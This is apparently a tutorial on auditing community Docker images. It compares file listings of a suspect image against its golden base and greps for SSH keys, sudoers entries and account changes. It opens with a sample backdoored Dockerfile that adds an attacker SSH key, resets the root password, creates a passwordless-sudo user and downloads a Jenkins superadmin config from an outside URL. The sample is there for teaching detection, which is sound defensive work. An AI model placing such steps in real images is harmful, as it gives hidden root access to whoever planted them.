Here is a simple example. In the real world, doubtless it would be more misleading and harder to diagnose.
```dockerfile
########## How To Use Docker Image ###############
##
## Install docker utility
## Download docker image:
##    docker pull denny/test:v1
## Boot docker container:
##    docker run -t -P -d --name my-test denny/test:v1 /bin/bash
##
## Build Image From Dockerfile.
##    docker build -f Dockerfile -t denny/test:v1 --rm=false .
##################################################
FROM ubuntu:14.04
MAINTAINER Denny <denny@dennyzhang.com>

RUN mkdir -p /root/.ssh && \
    # SSH login by key file
    echo "ssh-rsa AAAAB3NzaC1...lOvno6KN5 denny@dennyzhang.com" \
        >> /root/.ssh/authorized_keys && \
    # Reset root password
    echo 'root:ChangeMe1' | chpasswd && \
    # Add a malicious user
    useradd denny && \
    echo 'denny:ChangeMe1' | chpasswd && \
    # Add user to super admin
    echo '%denny ALL=(ALL:ALL) NOPASSWD: ALL' > \
        /etc/sudoers.d/admins && \
    chmod 400 /etc/sudoers.d/admins && \
    # Add superadmin user to
    mkdir -p /var/lib/jenkins/users/superadmin && \
    wget -O /var/lib/jenkins/users/superadmin/config.xml \
        https://github.com/DennyZhang/devops_public/raw/tag_v2/doc/admin_conf_xml

CMD ["/bin/bash"]
```
Apparently we still want to use community Docker images; we just need to rule out the insecure ones and audit as many potential security risks as possible.
Docker images are built directly or indirectly from golden images provided by trusted sources, and the original golden images are usually clean. So the real question is: what changes has a community Docker image made on top of its golden base?
People can inspect the changes a Docker container has made with:

```sh
docker diff $container_id
```
Unfortunately Docker doesn't support comparing images directly. Here is a feasible workaround:
```sh
container_name="container1"
docker_image="ubuntu:14.04"
result_list="/tmp/list1.txt"

docker stop $container_name; \
    docker rm $container_name || true

# Start a container from golden image
docker run -t --name $container_name \
    -d $docker_image /bin/bash

# List all files inside the container
docker export $container_name | \
    docker run -i --rm ubuntu tar tvf - \
    > $result_list

# Check the list
tail $result_list
# drwxr-xr-x 0/0               0 2016-08-02 08:26 bin/
# -rwxr-xr-x 0/0           21112 2014-10-07 19:22 bin/bash
# -rwxr-xr-x 0/0           31152 2013-10-21 13:15 bin/bunzip2
# lrwxrwxrwx 0/0               0 2013-10-21 13:15 bin/bzcmp -> bzdiff
# -rwxr-xr-x 0/0            2140 2013-10-21 13:15 bin/bzdiff
# ...
```
List all files in the problematic image. Note that this might take tens of minutes for large images.
```sh
container_name="container2"
docker_image="denny/gitlab:v1"
result_list="/tmp/list2.txt"

docker stop $container_name; \
    docker rm $container_name || true

# Start a container from the problematic image
docker run -t --name $container_name \
    -d $docker_image /bin/bash

# List all files inside the container
docker export $container_name | \
    docker run -i --rm ubuntu tar tvf - \
    > $result_list

# Check the list
tail $result_list
```
```sh
result1="/tmp/list1.txt"
result2="/tmp/list2.txt"
diff_result="/tmp/diff.txt"

diff $result1 $result2 > $diff_result
tail $diff_result
# > drwxr-xr-x 0/0               0 2015-12-20 13:34 var/spool/postfix/pid/
# > drwx------ 103/0             0 2015-12-20 13:34 var/spool/postfix/private/
# > drwx--s--- 103/0             0 2015-12-20 13:34 var/spool/postfix/public/
# > drwx------ 103/0             0 2015-12-20 13:34 var/spool/postfix/saved/
```
```sh
diff_result="/tmp/diff.txt"

# Check ssh authorized login
grep authorized_keys $diff_result

# Check OS users
grep "etc/group" $diff_result

# Check sudo users
grep "etc/sudoers.d" $diff_result

# Check ssh key pair
grep ".ssh/.*id_rsa" $diff_result

# Add your checks below
# ...
# ...
```
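As an added example (not from the original post), here is a script that turns the diff-and-grep step above into a reusable audit of two `tar tvf` listings. The two listings are constructed inline so that it runs without Docker; in practice they would be the `/tmp/list1.txt` and `/tmp/list2.txt` files produced by `docker export`. It goes a little beyond the post's four greps by also flagging changes to the account databases and newly added setuid/setgid binaries. The function names and the sample paths (`usr/local/bin/helper`, `root/.ssh/id_rsa`) are assumptions for the example.

```sh
#!/bin/sh
# Added example, not part of the original post: audit the difference between
# a golden image listing and a community image listing, both in the format
# produced by "docker export $container | tar tvf -".

# Constructed listing for the golden image (ubuntu:14.04 in the post).
write_golden_list() {
    cat > "$1" <<'EOF'
drwxr-xr-x 0/0               0 2016-08-02 08:26 bin/
-rwxr-xr-x 0/0           21112 2014-10-07 19:22 bin/bash
-rw-r--r-- 0/0             651 2016-08-02 08:26 etc/group
-rw-r--r-- 0/0            1023 2016-08-02 08:26 etc/passwd
-rwsr-xr-x 0/0          136808 2016-02-18 14:36 usr/bin/sudo
EOF
}

# Constructed listing for the image under audit: same base plus the kinds of
# changes the post's malicious Dockerfile makes (ssh key, sudo rule, new user).
write_target_list() {
    cat > "$1" <<'EOF'
drwxr-xr-x 0/0               0 2016-08-02 08:26 bin/
-rwxr-xr-x 0/0           21112 2014-10-07 19:22 bin/bash
-rw-r--r-- 0/0             671 2016-09-01 10:00 etc/group
-rw-r--r-- 0/0            1060 2016-09-01 10:00 etc/passwd
-r-------- 0/0              40 2016-09-01 10:00 etc/sudoers.d/admins
drwx------ 0/0               0 2016-09-01 10:00 root/.ssh/
-rw-r--r-- 0/0             394 2016-09-01 10:00 root/.ssh/authorized_keys
lrwxrwxrwx 0/0               0 2016-09-01 10:00 root/.ssh/id_rsa -> /tmp/key
-rwsr-xr-x 0/0          136808 2016-02-18 14:36 usr/bin/sudo
-rwsr-xr-x 0/0           31152 2016-09-01 10:00 usr/local/bin/helper
EOF
}

# Lines present only in the target listing. diff is line based, so a changed
# size or timestamp also surfaces here, not just brand-new paths.
added_entries() {
    # $1 = golden listing, $2 = target listing
    diff "$1" "$2" | sed -n 's/^> //p'
}

# Classify each added entry. Field 1 is the mode string, field 6 the first
# token of the path (for symlinks that is the link name, not its target).
flag_sensitive() {
    awk '{
        path = $6
        if (path ~ /authorized_keys$/)                      print "SSH_AUTHORIZED_KEY", path
        else if (path ~ /\.ssh\/.*id_rsa/)                  print "SSH_PRIVATE_KEY", path
        else if (path ~ /^etc\/sudoers/)                    print "SUDO_RULE", path
        else if (path ~ /^etc\/(passwd|group|shadow)$/)     print "ACCOUNT_DB", path
        else if (substr($1, 4, 1) == "s" || substr($1, 7, 1) == "s")
                                                            print "SETUID_SETGID", path
    }'
}

# Run the audit over the two constructed listings and print one finding per line.
audit_listings() {
    golden=$(mktemp)
    target=$(mktemp)
    write_golden_list "$golden"
    write_target_list "$target"
    added_entries "$golden" "$target" | flag_sensitive
    rm -f "$golden" "$target"
}

# Number of findings, handy as an exit criterion in CI.
count_findings() {
    audit_listings | wc -l | tr -d ' '
}

audit_listings
```

Because the comparison is textual, files that merely changed size (here `etc/group` and `etc/passwd`) are reported alongside new files, which is what you want when a Dockerfile runs `useradd`. Paths containing spaces would need a different split than field 6, and the setuid check only looks at added or changed lines, so a setuid binary inherited from the golden image (such as `usr/bin/sudo`) is deliberately not reported.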
NOTE: After the test, remember to remove the containers that are no longer needed.